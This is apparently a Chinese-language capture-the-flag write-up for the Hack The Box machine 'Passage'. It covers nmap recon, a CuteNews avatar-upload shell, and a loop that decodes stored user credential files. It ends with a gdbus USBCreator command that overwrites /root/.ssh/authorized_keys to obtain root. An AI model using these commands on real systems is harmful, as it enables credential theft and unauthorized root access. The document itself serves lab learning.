image-20200906182645713

recon:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 00:15 EDT
Nmap scan report for passage.htb (10.129.7.210)
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.00 seconds

这机器部署了Fail2ban,扫描频率过高就会被封一段时间的ip,看作者对这台机器的rating,CVE评分远高于Enumeration,也说明了这机器大概率不需要爆破的操作。

80端口是CuteNews,谷歌找最新的exploit,找到这个:https://www.exploit-db.com/exploits/48458

exploit里要求用户至少得是Editor,但是注册的用户权限为Commenter,事实上一年前的这个就能用:https://www.exploit-db.com/exploits/46698

msf模块导入不成功,粗略看了一下,就是用户上传头像处可以直接上传php文件。

拿到shell之后在/var/www/html/CuteNews/cdata/users/ 文件夹下看见大量用户的凭据。(这套cms不用关系型数据库,所有数据以base64编码储存在php文件里)

1
2
3
4
5
6
7
for i in $(ls /var/www/html/CuteNews/cdata/users/*.php)
do
sed -n 2p $i | base64 -d
echo
echo -------------------------------------------------------------------
echo
done

用户密码以sha256方式作为信息摘要,其中有一个解密出来为atlanta1,成功su到paul用户。

paul用户的.ssh/authorized_keys中找到了另外一个用户nadav的公钥,与.ssh/id_rsa.pub的内容一样,猜想nadav用户的.ssh/authorized_keys中也有paul用户的公钥,尝试用/home/paul/.ssh/id_rsa登陆nadav用户成功。

nadav用户的用户组如下

1
2
nadav@passage:/home/paul/.ssh$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

问题出在dbus上面,可以以root身份来覆盖系统任意文件,具体查看这个:https://www.anquanke.com/post/id/181937

exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
nadav@passage:/tmp$ ssh-keygen -f key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in key.
Your public key has been saved in key.pub.
The key fingerprint is:
SHA256:yqeGMigRB8/SJbkHfUY18B9PJolRomyejn5Z+O7CkGw nadav@passage
The key's randomart image is:
+---[RSA 2048]----+
| o .oo=.. |
|. + o.oo = . |
| = = o+ o + o |
|o * .o . . * |
| + o .o.S . . |
|. E+... |
| o ..+++. |
|o o.. *o. |
|. o.o.+o |
+----[SHA256]-----+
nadav@passage:/tmp$ gdbus call -y -d com.ubuntu.USBCreator -o /com/ubuntu/USBCreator -m com.ubuntu.USBCreator.Image /tmp/key.pub /root/.ssh/authorized_keys true
()
nadav@passage:/tmp$ ssh -i key root@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Last login: Sun Sep 6 03:37:26 2020 from 10.10.14.18
root@passage:~# whoami && hostname && wc -c /root/root.txt
root
passage
33 /root/root.txt